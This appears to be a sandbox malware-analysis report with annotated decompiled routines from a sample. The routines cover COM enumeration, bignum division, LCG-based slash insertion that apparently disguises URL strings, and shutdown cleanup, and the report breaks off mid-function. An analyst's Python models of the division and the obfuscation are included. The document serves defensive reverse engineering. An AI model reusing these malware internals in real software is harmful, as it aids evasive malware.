                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: String$AllocFree$ArrayDestroySafeSleep
                            • String ID:
                            • API String ID: 3193056040-0
                            • Opcode ID: 8c8002d91d2e2af396e8082dfde9808f2ade2a2c0c853211ebca3efb8c95bacb
                            • Instruction ID: c6b9ee268fee12789768c38a078ee523c1ff9bb0826224ce09657b2dda448eb8
                            • Opcode Fuzzy Hash: 8c8002d91d2e2af396e8082dfde9808f2ade2a2c0c853211ebca3efb8c95bacb
                            • Instruction Fuzzy Hash: 37513E72900249EFCB00DFE4C8849EEB7B6FF88310B158828E915EB224D775AD85DF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 45%
                            			E00F152A1(intOrPtr* __eax) {
                            				void* _v8;
                            				WCHAR* _v12;
                            				void* _v16;
                            				char _v20;
                            				void* _v24;
                            				intOrPtr _v28;
                            				void* _v32;
                            				intOrPtr _v40;
                            				short _v48;
                            				intOrPtr _v56;
                            				short _v64;
                            				intOrPtr* _t54;
                            				intOrPtr* _t56;
                            				intOrPtr _t57;
                            				intOrPtr* _t58;
                            				intOrPtr* _t60;
                            				void* _t61;
                            				intOrPtr* _t63;
                            				intOrPtr* _t65;
                            				intOrPtr* _t67;
                            				intOrPtr* _t69;
                            				intOrPtr* _t71;
                            				intOrPtr* _t74;
                            				intOrPtr* _t76;
                            				intOrPtr _t78;
                            				intOrPtr* _t82;
                            				intOrPtr* _t86;
                            				intOrPtr _t102;
                            				intOrPtr _t108;
                            				void* _t117;
                            				void* _t121;
                            				void* _t122;
                            				intOrPtr _t129;
                            
                            				_t122 = _t121 - 0x3c;
                            				_push( &_v8);
                            				_push(__eax);
                            				_t117 =  *((intOrPtr*)( *__eax + 0x48))(); // vtable slot 18 (0x48 / 4) of the object passed in; the decompiler did not recover the interface, so the slot names below stop at IUnknown
                            				if(_t117 >= 0) {
                            					_t54 = _v8;
                            					_t102 =  *0xf1d2b8; // 0x48da5a8
                            					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t102 + 0xf1e038,  &_v32); // slot 0 = IUnknown::QueryInterface; the IID sits at 0xf1e038 in .data, adjusted by the global at 0xf1d2b8, which is added to every data address in this function (consistent with a relocation delta)
                            					_t56 = _v8;
                            					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56); // slot 2 = IUnknown::Release
                            					if(_t117 >= 0) {
                            						__imp__#2(0xf1c2b0); // OLEAUT32 ordinal 2 = SysAllocString (see APIs): BSTR from the wide string at 0xf1c2b0
                            						_v28 = _t57; // the decompiler reuses _t57, but the value stored is the SysAllocString result (it is freed with SysFreeString below)
                            						if(_t57 == 0) {
                            							_t117 = 0x8007000e; // E_OUTOFMEMORY
                            						} else {
                            							_t60 = _v32;
                            							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24); // slot 47: takes the BSTR and returns an enumerable object (it exposes a count and an indexed fetch below)
                            							_t86 = __imp__#6; // OLEAUT32 ordinal 6 = SysFreeString
                            							_t117 = _t61;
                            							if(_t117 >= 0) {
                            								_t63 = _v24;
                            								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20); // slot 9: element count into _v20
                            								if(_t117 >= 0) {
                            									_t129 = _v20;
                            									if(_t129 != 0) {
                            										_v64 = 3; // two 16-byte locals laid out like VARIANTs: vt = 3 (VT_I4)
                            										_v48 = 3;
                            										_v56 = 0;
                            										_v40 = 0; // lVal of the second one doubles as the loop index
                            										if(_t129 > 0) {
                            											while(1) {
                            												_t67 = _v24;
                            												asm("movsd"); // the eight movsd copy both 16-byte locals onto the stack as by-value arguments of the call below
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												_t122 = _t122;
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8); // slot 11: fetch element _v40 (the by-value arguments are elided by the decompiler)
                            												if(_t117 < 0) {
                            													goto L16;
                            												}
                            												_t69 = _v8;
                            												_t108 =  *0xf1d2b8; // 0x48da5a8
                            												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t108 + 0xf1e0bc,  &_v16); // QueryInterface for a second IID at 0xf1e0bc
                            												if(_t117 >= 0) {
                            													_t74 = _v16;
                            													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12); // slot 13: returns a BSTR name in _v12
                            													if(_t117 >= 0 && _v12 != 0) {
                            														_t78 =  *0xf1d2b8; // 0x48da5a8
                            														if(lstrcmpW(_v12, _t78 + 0xf1e078) == 0) { // case-sensitive match against the wide string at 0xf1e078
                            															_t82 = _v16;
                            															 *((intOrPtr*)( *_t82 + 0x114))(_t82); // slot 69: the action taken on the matching element, no arguments
                            														}
                            														 *_t86(_v12); // SysFreeString(name)
                            													}
                            													_t76 = _v16;
                            													 *((intOrPtr*)( *_t76 + 8))(_t76); // Release
                            												}
                            												_t71 = _v8;
                            												 *((intOrPtr*)( *_t71 + 8))(_t71); // Release
                            												_v40 = _v40 + 1;
                            												if(_v40 < _v20) {
                            													continue;
                            												}
                            												goto L16;
                            											}
                            										}
                            									}
                            								}
                            								L16:
                            								_t65 = _v24;
                            								 *((intOrPtr*)( *_t65 + 8))(_t65); // Release
                            							}
                            							 *_t86(_v28); // SysFreeString(query BSTR)
                            						}
                            						_t58 = _v32;
                            						 *((intOrPtr*)( *_t58 + 8))(_t58); // Release
                            					}
                            				}
                            				return _t117; // HRESULT
                            			}

                            (Instruction addresses for the listing above, 0x00f152a6 to 0x00f15433, formed a side-by-side column on the original page and are not reproduced here.)

                            APIs
                            • SysAllocString.OLEAUT32(00F1C2B0), ref: 00F152F1
                            • lstrcmpW.KERNEL32(00000000,?), ref: 00F153D3
                            • SysFreeString.OLEAUT32(00000000), ref: 00F153EC
                            • SysFreeString.OLEAUT32(?), ref: 00F1541B
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: String$Free$Alloclstrcmp
                            • String ID:
                            • API String ID: 1885612795-0
                            • Opcode ID: 7a4b1644df803639e20fc55577ccc4a7b1415b6ff64c842edae18758f2055b71
                            • Instruction ID: 0c6bb8cf11bee988d3eb6e0e29e7486ccb55cf2e1fca564b04c0299f0dfb9541
                            • Opcode Fuzzy Hash: 7a4b1644df803639e20fc55577ccc4a7b1415b6ff64c842edae18758f2055b71
                            • Instruction Fuzzy Hash: 89515171D00519EFCB00DFA8C8888EEF7B6FF88705B148598E915EB220D7769D81DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            // Annotation (analyst's reading, not decompiler output): the shape below is that of
                            // schoolbook multi-precision division on 32-bit limbs. __eax = limb count of the
                            // dividend _a8; _a12 / _a16 = divisor buffer and its limb count; the remainder is
                            // written to _a4 and the quotient limbs to the global array at 0xf1d168. The helper
                            // roles noted inline are inferred from how each call is used, not confirmed by the report.
                            			E00F12698(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				void _v156;
                            				void _v428;
                            				void* _t55;
                            				unsigned int _t56;
                            				signed int _t66;
                            				signed int _t74;
                            				void* _t76;
                            				signed int _t79;
                            				void* _t81;
                            				void* _t92;
                            				void* _t96;
                            				signed int* _t99;
                            				signed int _t101;
                            				signed int _t103;
                            				void* _t107;
                            
                            				_t92 = _a12;
                            				_t101 = __eax;
                            				_t55 = E00F1455D(_a16, _t92); // presumably: number of significant limbs of the divisor
                            				_t79 = _t55;
                            				if(_t79 == 0) { // zero divisor: nothing to do
                            					L18:
                            					return _t55;
                            				}
                            				_t56 =  *(_t92 + _t79 * 4 - 4); // most significant limb of the divisor
                            				_t81 = 0;
                            				_t96 = 0x20;
                            				if(_t56 == 0) {
                            					L4:
                            					_t97 = _t96 - _t81; // normalization shift = 32 - bit length of the top limb
                            					_v12 = _t96 - _t81;
                            					E00F16CD0(_t79,  &_v428); // E00F16CD0(count, buf) appears to zero count limbs
                            					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00F121F3(_t101,  &_v428, _a8, _t96 - _t81); // dividend << shift into _v428, carry-out limb stored at index _t101
                            					E00F121F3(_t79,  &_v156, _a12, _t97); // divisor << shift into _v156
                            					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c)); // normalized top limb of the divisor (the estimator)
                            					_t66 = E00F16CD0(_t101, 0xf1d168); // clear the quotient
                            					_t103 = _t101 - _t79; // index of the top quotient limb; negative when the dividend is shorter
                            					_a8 = _t103;
                            					if(_t103 < 0) {
                            						L17:
                            						E00F16CD0(_a16, _a4);
                            						E00F13213(_t79,  &_v428, _a4, _t97); // remainder = _v428 >> shift, into _a4
                            						memset( &_v428, 0, 0x10c); // wipe the work buffers before returning
                            						_t55 = memset( &_v156, 0, 0x84);
                            						goto L18;
                            					}
                            					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8; // points at the top limb of the current remainder window
                            					do {
                            						if(_v8 != 0xffffffff) {
                            							// qhat = ((r[j+n] << 32) | r[j+n-1]) / (vtop + 1); the +1 keeps the estimate <= the true limb
                            							_push(1);
                            							_push(0);
                            							_push(0);
                            							_push( *_t99);
                            							L00F1B030(); // _allmul: r[j+n] * 2^32
                            							_t74 = _t66 +  *(_t99 - 4);
                            							asm("adc edx, esi");
                            							_push(0);
                            							_push(_v8 + 1);
                            							_push(_t92);
                            							_push(_t74);
                            							L00F1B02A(); // _aulldiv
                            							if(_t92 > 0 || _t74 > 0xffffffff) { // clamp a 64-bit result to 0xffffffff
                            								_t74 = _t74 | 0xffffffff;
                            								_v16 = _v16 & 0x00000000;
                            							}
                            						} else {
                            							_t74 =  *_t99; // vtop == 0xffffffff: use the top window limb directly
                            						}
                            						_t106 = _t107 + _a8 * 4 - 0x1a8; // base of the remainder window
                            						_a12 = _t74; // _a12 is reused as the running quotient limb
                            						_t76 = E00F13CAA(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74); // window -= qhat * divisor
                            						while(1) {
                            							 *_t99 =  *_t99 - _t76; // apply the borrow to the top window limb
                            							if( *_t99 != 0) {
                            								goto L14;
                            							}
                            							L13:
                            							_t92 =  &_v156;
                            							if(E00F1675C(_t79, _t92, _t106) < 0) { // window < divisor: estimate corrected
                            								break;
                            							}
                            							L14: // correction: window still >= divisor, subtract once more and bump the limb
                            							_a12 = _a12 + 1;
                            							_t76 = E00F19089(_t79,  &_v156, _t106, _t106);
                            							 *_t99 =  *_t99 - _t76;
                            							if( *_t99 != 0) {
                            								goto L14;
                            							}
                            							goto L13;
                            						}
                            						_a8 = _a8 - 1;
                            						_t66 = _a12;
                            						_t99 = _t99 - 4;
                            						 *(0xf1d168 + _a8 * 4) = _t66; // store the quotient limb (index handling as rendered by the decompiler)
                            					} while (_a8 >= 0);
                            					_t97 = _v12;
                            					goto L17;
                            				}
                            				while(_t81 < _t96) { // bit length of the top limb, 1..32
                            					_t81 = _t81 + 1;
                            					_t56 = _t56 >> 1;
                            					if(_t56 != 0) {
                            						continue;
                            					}
                            					goto L4;
                            				}
                            				goto L4;
                            			}

                            Statement-by-statement instruction addresses for E00F12698 span 0x00f1269b to 0x00f1282c; the original listing gives one per statement, with 0x00000000 for jumps that emit no code.

                            APIs
                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00F1274B
                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00F12761
                            • memset.NTDLL ref: 00F1280A
                            • memset.NTDLL ref: 00F12820
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: memset$_allmul_aulldiv
                            • String ID:
                            • API String ID: 3041852380-0
                            • Opcode ID: 0d96a10a8e4df3ea16314ad47652c6fcad0cfddaeee599224217c3c5c4798244
                            • Instruction ID: 5f546b2b332ecc26ce5fdba51e660fa66e7cee7d941dda203186799086c67286
                            • Opcode Fuzzy Hash: 0d96a10a8e4df3ea16314ad47652c6fcad0cfddaeee599224217c3c5c4798244
                            • Instruction Fuzzy Hash: 3441A131B00219AFDB109FA8CC41BEE7779EF45320F104569B919A71C1DB74AEA4AB90
                            Uniqueness

                            Uniqueness Score: -1.00%
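Added example (not from the report or the sample): a Python re-implementation of the limb-wise long division that E00F12698 appears to implement. The roles given to the sub-routines (E00F1455D counts significant limbs, E00F121F3 and E00F13213 shift left and right, E00F13CAA multiply-subtracts, E00F19089 subtracts, E00F1675C compares) are inferred from the call pattern in the listing, not stated by the report; the estimator, its clamp to 0xffffffff and the correction loop follow the decompiled control flow. `to_limbs`/`from_limbs` are conversion helpers for checking against Python's native integers.

```python
# Added example: limb-wise long division in the shape of E00F12698.
# Sub-routine roles (count limbs, shift, multiply-subtract, subtract, compare)
# are an analyst's reading of the decompiled call pattern, not report facts.
MASK32 = 0xFFFFFFFF

def to_limbs(x, count):
    """Integer -> little-endian list of `count` 32-bit limbs (test helper)."""
    return [(x >> (32 * i)) & MASK32 for i in range(count)]

def from_limbs(limbs):
    return sum(l << (32 * i) for i, l in enumerate(limbs))

def sig_limbs(limbs):
    """Number of significant limbs (role assumed for E00F1455D)."""
    n = len(limbs)
    while n and limbs[n - 1] == 0:
        n -= 1
    return n

def shl_limbs(limbs, s):
    """Shift left by s (< 32) bits; returns len(limbs)+1 limbs, carry-out last (cf. E00F121F3)."""
    out, carry = [], 0
    for l in limbs:
        x = (l << s) | carry
        out.append(x & MASK32)
        carry = x >> 32
    out.append(carry)
    return out

def shr_limbs(limbs, s):
    """Shift right by s (< 32) bits, same limb count (cf. E00F13213)."""
    out = []
    for i, l in enumerate(limbs):
        nxt = limbs[i + 1] if i + 1 < len(limbs) else 0
        out.append(((l >> s) | (nxt << (32 - s))) & MASK32)
    return out

def cmp_limbs(a, b):
    """Compare equal-length limb arrays, most significant limb first (cf. E00F1675C)."""
    for x, y in zip(reversed(a), reversed(b)):
        if x != y:
            return -1 if x < y else 1
    return 0

def mulsub_limbs(u, j, v, qhat):
    """u[j .. j+len(v)] -= qhat * v (cf. E00F13CAA)."""
    carry = borrow = 0
    for i, vi in enumerate(v):
        p = qhat * vi + carry
        carry = p >> 32
        t = u[j + i] - (p & MASK32) - borrow
        u[j + i] = t & MASK32
        borrow = 1 if t < 0 else 0
    u[j + len(v)] = (u[j + len(v)] - carry - borrow) & MASK32

def sub_limbs(u, j, v):
    """u[j .. j+len(v)] -= v (cf. E00F19089)."""
    borrow = 0
    for i, vi in enumerate(v):
        t = u[j + i] - vi - borrow
        u[j + i] = t & MASK32
        borrow = 1 if t < 0 else 0
    u[j + len(v)] = (u[j + len(v)] - borrow) & MASK32

def bigdiv(u, v):
    """Return (quotient limbs, remainder limbs) of u / v, or None for a zero divisor."""
    n = sig_limbs(v)
    if n == 0:                       # the sample returns early here as well
        return None
    s = 32 - v[n - 1].bit_length()   # normalization shift (the 0x20 - bitlen loop)
    m = len(u)
    un = shl_limbs(u, s)             # m + 1 limbs, carry-out on top
    vn = shl_limbs(v[:n], s)[:n]     # n limbs, top bit of vn[n-1] is now set
    vtop = vn[n - 1]
    q = [0] * max(m - n + 1, 0)
    for j in range(m - n, -1, -1):
        if vtop != MASK32:
            # estimate from the top two window limbs; the +1 keeps qhat <= the true
            # digit, and the clamp mirrors the sample's check on the _aulldiv result
            qhat = min(((un[j + n] << 32) | un[j + n - 1]) // (vtop + 1), MASK32)
        else:
            qhat = un[j + n]
        mulsub_limbs(un, j, vn, qhat)
        # correction loop: window still >= divisor -> subtract once more, bump qhat
        while un[j + n] != 0 or cmp_limbs(un[j:j + n], vn) >= 0:
            sub_limbs(un, j, vn)
            qhat += 1
        q[j] = qhat
    rem = (shr_limbs(un, s) + [0] * n)[:n]   # denormalize; un[n:] is zero by now
    return q, rem
```

The quotient has len(u) - n + 1 limbs (none when the dividend is shorter than the divisor) and the remainder n limbs, which matches the sizes the listing writes to 0xf1d168 and _a4.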

                            C-Code - Quality: 78%
                            // Annotation: COM call sequence. __eax is an interface pointer; vtable slot 0x24/4 = 9
                            // is called as (this, &_v12) to obtain a second interface, and slot 0x100/4 = 64 of
                            // that interface returns a BSTR in _v16. "__imp__#6" is OLEAUT32 ordinal 6
                            // (SysFreeString), "*_t32 + 8" is IUnknown::Release, 0x8007000e is E_OUTOFMEMORY.
                            // Output: *_a4 = heap copy of the string from E00F155DC (the sample's allocator),
                            // *_a8 = its size in bytes including the terminator; the return value is the HRESULT.
                            			E00F17796(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                            				intOrPtr _v8;
                            				void* _v12;
                            				void* _v16;
                            				intOrPtr _t26;
                            				intOrPtr* _t28;
                            				intOrPtr _t31;
                            				intOrPtr* _t32;
                            				void* _t39;
                            				int _t46;
                            				intOrPtr* _t47;
                            				int _t48;
                            
                            				_t47 = __eax;
                            				_push( &_v12);
                            				_push(__eax);
                            				_t39 = 0;
                            				_t46 = 0;
                            				_t26 =  *((intOrPtr*)( *__eax + 0x24))(); // vtable slot 9: (this, &_v12)
                            				_v8 = _t26;
                            				if(_t26 < 0) {
                            					L13:
                            					return _v8;
                            				}
                            				if(_v12 == 0) { // no object yet: wait 200 ms and try the same slot once more
                            					Sleep(0xc8);
                            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                            				}
                            				if(_v8 >= _t39) {
                            					_t28 = _v12;
                            					if(_t28 != 0) {
                            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16); // vtable slot 64: returns a BSTR
                            						_v8 = _t31;
                            						if(_t31 >= 0) {
                            							_t46 = lstrlenW(_v16);
                            							if(_t46 != 0) { // note: an empty BSTR is never passed to SysFreeString
                            								_t46 = _t46 + 1; // characters including the terminator
                            								_t48 = _t46 + _t46; // bytes
                            								_t39 = E00F155DC(_t48);
                            								if(_t39 == 0) {
                            									_v8 = 0x8007000e; // E_OUTOFMEMORY
                            								} else {
                            									memcpy(_t39, _v16, _t48);
                            								}
                            								__imp__#6(_v16); // SysFreeString
                            							}
                            						}
                            						_t32 = _v12;
                            						 *((intOrPtr*)( *_t32 + 8))(_t32); // IUnknown::Release
                            					}
                            					 *_a4 = _t39;
                            					 *_a8 = _t46 + _t46; // byte length; set even when the allocation failed and *_a4 is NULL
                            				}
                            				goto L13;
                            			}

                            Statement-by-statement instruction addresses for E00F17796 span 0x00f177a2 to 0x00f17852; the original listing gives one per statement, with 0x00000000 for jumps that emit no code.

                            APIs
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: FreeSleepStringlstrlenmemcpy
                            • String ID:
                            • API String ID: 1198164300-0
                            • Opcode ID: 976124cc0b3647c4042bce58b58c637cb05fb462289adffb4fd6370ca7a8c08c
                            • Instruction ID: 0d6ea369a22e2b18947ba19e96ff386eaa7630a56084454a52d1379ea65eea49
                            • Opcode Fuzzy Hash: 976124cc0b3647c4042bce58b58c637cb05fb462289adffb4fd6370ca7a8c08c
                            • Instruction Fuzzy Hash: 30215675D00209EFCB10EFA8D8889DEBBB9FF49311B248169E945E7210E774DA41DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E00F1484D(unsigned int __eax, void* __ecx) {
                            				void* _v8;
                            				void* _v12;
                            				signed int _t21;
                            				signed short _t23;
                            				char* _t27;
                            				void* _t29;
                            				void* _t30;
                            				unsigned int _t33;
                            				void* _t37;
                            				unsigned int _t38;
                            				void* _t41;
                            				void* _t42;
                            				int _t45;
                            				void* _t46;
                            
                            				_t42 = __eax;
                            				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                            				_t38 = __eax;
                            				_t30 = RtlAllocateHeap( *0xf1d270, 0, (__eax >> 3) + __eax + 1);
                            				_v12 = _t30;
                            				if(_t30 != 0) {
                            					_v8 = _t42;
                            					do {
                            						_t33 = 0x18;
                            						if(_t38 <= _t33) {
                            							_t33 = _t38;
                            						}
                            						_t21 =  *0xf1d288; // 0xa25004d8
                            						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                            						 *0xf1d288 = _t23;
                            						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                            						memcpy(_t30, _v8, _t45);
                            						_v8 = _v8 + _t45;
                            						_t27 = _t30 + _t45;
                            						_t38 = _t38 - _t45;
                            						_t46 = _t46 + 0xc;
                            						 *_t27 = 0x2f;
                            						_t13 = _t27 + 1; // 0x1
                            						_t30 = _t13;
                            					} while (_t38 > 8);
                            					memcpy(_t30, _v8, _t38 + 1);
                            				}
                            				return _v12;
                            			}

                            Statement-by-statement instruction addresses for E00F1484D span 0x00f14855 to 0x00f148e4; the original listing gives one per statement.

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00F1A88E,00000000,?,75145520,00F164DC,?,057F95B0), ref: 00F14858
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00F14870
                            • memcpy.NTDLL(00000000,057F95B0,-00000008,?,?,?,00F1A88E,00000000,?,75145520,00F164DC,?,057F95B0), ref: 00F148B4
                            • memcpy.NTDLL(00000001,057F95B0,00000001,00F164DC,?,057F95B0), ref: 00F148D5
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: memcpy$AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 1819133394-0
                            • Opcode ID: 471cc006cd26d1451a54abc0891f6bd5fd5bb4b4b9f13a73a417f26060650360
                            • Instruction ID: b4de465732a5ea13f5498284b7543289a4e8207d262137dd86685a0af6f1dde5
                            • Opcode Fuzzy Hash: 471cc006cd26d1451a54abc0891f6bd5fd5bb4b4b9f13a73a417f26060650360
                            • Instruction Fuzzy Hash: C7112572A00158AFC7108BAAEC84DDEBFFEDBD4360B164176F504D7250EA749E44A7A0
                            Uniqueness

                            Uniqueness Score: -1.00%
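Added example (not part of the report or the sample): a Python model of E00F1484D's slash insertion and of its trivial inverse. The LCG constants, the 8..23 chunk rule, the loop condition and the heap-size formula are read from the listing; the seed 0xa25004d8 is the value the dump comment shows at 0xf1d288. That the string being processed is a URI path component is an analyst's assumption, and the input string is constructed.

```python
# Added example: model of E00F1484D's '/'-insertion. Constants, chunk rule and
# loop condition are read from the listing; the seed is the value the dump
# shows at 0xf1d288. Calling the input a URI path is an analyst's assumption.
LCG_MULT = 0x19660D          # multiplier in the listing
LCG_INC = 0x3C6EF35F         # increment in the listing
MASK32 = 0xFFFFFFFF
OBSERVED_SEED = 0xA25004D8   # *0xf1d288 at the time of the dump
SAMPLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcd"   # constructed 40-byte input

def lcg_step(seed):
    """One step of the 32-bit LCG the sample keeps at 0xf1d288."""
    return (seed * LCG_MULT + LCG_INC) & MASK32

def insert_slashes(data, seed):
    """Return (data with '/' after each 8..23-byte chunk, updated seed).

    Mirrors the do/while in E00F1484D: chunk = (lcg & 0xffff) % (min(remaining, 24) - 8) + 8,
    repeated while more than 8 bytes remain, then the tail is appended. The sample
    has no guard for 8 bytes or fewer (modulus 0); the early return here is added.
    """
    remaining = len(data)
    if remaining <= 8:
        return data, seed
    out, pos = [], 0
    while True:
        chunk_max = min(remaining, 0x18)
        seed = lcg_step(seed)
        n = (seed & 0xFFFF) % (chunk_max - 8) + 8
        out.append(data[pos:pos + n])
        out.append('/')
        pos += n
        remaining -= n
        if remaining <= 8:          # the `while (_t38 > 8)` test
            break
    out.append(data[pos:])          # final memcpy of the tail
    return ''.join(out), seed

def strip_slashes(obfuscated):
    """Inverse: the routine only inserts characters, so dropping every '/' recovers the input."""
    return obfuscated.replace('/', '')

def max_output_len(n):
    """Buffer size the sample requests: (n >> 3) + n + 1, at most one '/' per 8 bytes plus NUL."""
    return (n >> 3) + n + 1
```

Each call advances the shared LCG state, so the slash positions differ between calls for the same input; the inverse needs no state at all, which is why the transform adds nothing beyond a cosmetic change of the string.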

                            C-Code - Quality: 100%
                            // Annotation: shutdown routine. Signals the event whose handle is kept at 0xf1d2a4
                            // (0x2e8 in this run), then polls the counter/flag at 0xf1d2f4 in 100 ms alertable
                            // sleeps until it reads 0; the 0x7fffffff ms budget is about 24.8 days, so the
                            // wait is effectively unbounded. Finally it closes the event and destroys the
                            // private heap at 0xf1d270 (0x5400000) that the other routines allocate from.
                            			E00F15C2B() {
                            				void* _t1;
                            				intOrPtr _t5;
                            				void* _t6;
                            				void* _t7;
                            				void* _t11;
                            
                            				_t1 =  *0xf1d2a4; // 0x2e8
                            				if(_t1 == 0) { // never initialised: nothing to tear down
                            					L8:
                            					return 0;
                            				}
                            				SetEvent(_t1); // tell the worker(s) to stop
                            				_t11 = 0x7fffffff; // remaining wait budget in ms
                            				while(1) {
                            					SleepEx(0x64, 1); // 100 ms, alertable so queued APCs still run
                            					_t5 =  *0xf1d2f4; // 0x0
                            					if(_t5 == 0) { // all workers gone
                            						break;
                            					}
                            					_t11 = _t11 - 0x64;
                            					if(_t11 > 0) {
                            						continue;
                            					}
                            					break;
                            				}
                            				_t6 =  *0xf1d2a4; // 0x2e8
                            				if(_t6 != 0) {
                            					CloseHandle(_t6);
                            				}
                            				_t7 =  *0xf1d270; // 0x5400000
                            				if(_t7 != 0) {
                            					HeapDestroy(_t7);
                            				}
                            				goto L8;
                            			}

                            Statement-by-statement instruction addresses for E00F15C2B span 0x00f15c2b to 0x00f15c7e; the original listing gives one per statement, with 0x00000000 for jumps that emit no code.

                            APIs
                            • SetEvent.KERNEL32(000002E8,00000001,00F14170), ref: 00F15C36
                            • SleepEx.KERNEL32(00000064,00000001), ref: 00F15C45
                            • CloseHandle.KERNEL32(000002E8), ref: 00F15C66
                            • HeapDestroy.KERNEL32(05400000), ref: 00F15C76
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: CloseDestroyEventHandleHeapSleep
                            • String ID:
                            • API String ID: 4109453060-0
                            • Opcode ID: 0bb58a3f743a82068eb1e5483e9d97465cbff23ddca3070a6231549158b646f0
                            • Instruction ID: 69eeaee3c1685042379732398a34a01b0add75327eeef432186f9e4492c79329
                            • Opcode Fuzzy Hash: 0bb58a3f743a82068eb1e5483e9d97465cbff23ddca3070a6231549158b646f0
                            • Instruction Fuzzy Hash: 2FF01C71B40756DBD724AF74DD4CBC63BACAB48F617068514B915D7690CA30C941B9E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            // Annotation: swaps the pointer at offset 0 of the global state block at 0xf1d35c
                            // (0x57f95b0 in this run) under the critical section embedded in that block. It
                            // spins in 10 ms sleeps while the field at index 0x16 is nonzero, frees the old
                            // pointer from the private heap unless it is NULL or the static default at 0xf1e823
                            // (image data region), then stores the new value. That value arrives as _v0, a
                            // stack slot the decompiler did not model, most likely the caller's first argument,
                            // which explains the low quality score.
                            			E00F14D70() {
                            				void* _v0;
                            				void** _t3;
                            				void** _t5;
                            				void** _t7;
                            				void** _t8;
                            				void* _t10;
                            
                            				_t3 =  *0xf1d35c; // 0x57f95b0
                            				__imp__( &(_t3[0x10])); // RtlEnterCriticalSection
                            				while(1) {
                            					_t5 =  *0xf1d35c; // 0x57f95b0
